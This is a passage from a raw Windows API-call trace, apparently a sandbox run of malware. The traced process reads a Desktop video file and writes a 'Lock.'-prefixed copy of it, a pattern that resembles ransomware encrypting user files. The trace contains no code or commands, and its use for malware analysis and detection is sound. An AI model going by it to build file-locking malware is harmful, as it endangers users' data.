Size=0x10) returned 0x34aa5f8 [0190.076] CryptDestroyHash (hHash=0xaa58a0) returned 1 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0190.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0190.076] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0190.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.077] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.077] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.077] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.077] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0190.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.078] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/wI0b0QZdP-KcsT.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wi0b0qzdp-kcst.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0190.078] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.078] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0190.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0190.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0190.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.079] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.079] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.079] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0190.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0190.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0190.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0190.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.080] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0190.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0190.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0190.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0190.080] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.wI0b0QZdP-KcsT.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.wi0b0qzdp-kcst.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0190.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0190.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0190.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.081] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.082] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.082] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.082] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0190.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0190.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0190.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0190.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0190.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0190.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0190.084] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0190.084] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xd2af, lpOverlapped=0x0) returned 1 [0190.086] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0190.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0190.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd2af) returned 0x24d7a58 [0190.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0190.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0190.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd2af) returned 0x24e4d10 [0190.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0190.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.102] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd2af) returned 0x24d7a58 [0190.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0190.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0190.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.103] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0190.103] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0190.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.103] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0190.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0190.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c08 [0190.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd2af) returned 0x24d7a58 [0190.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2658 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0190.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd2af) returned 0x34b2250 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0190.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0190.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0190.108] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.108] HeapFree 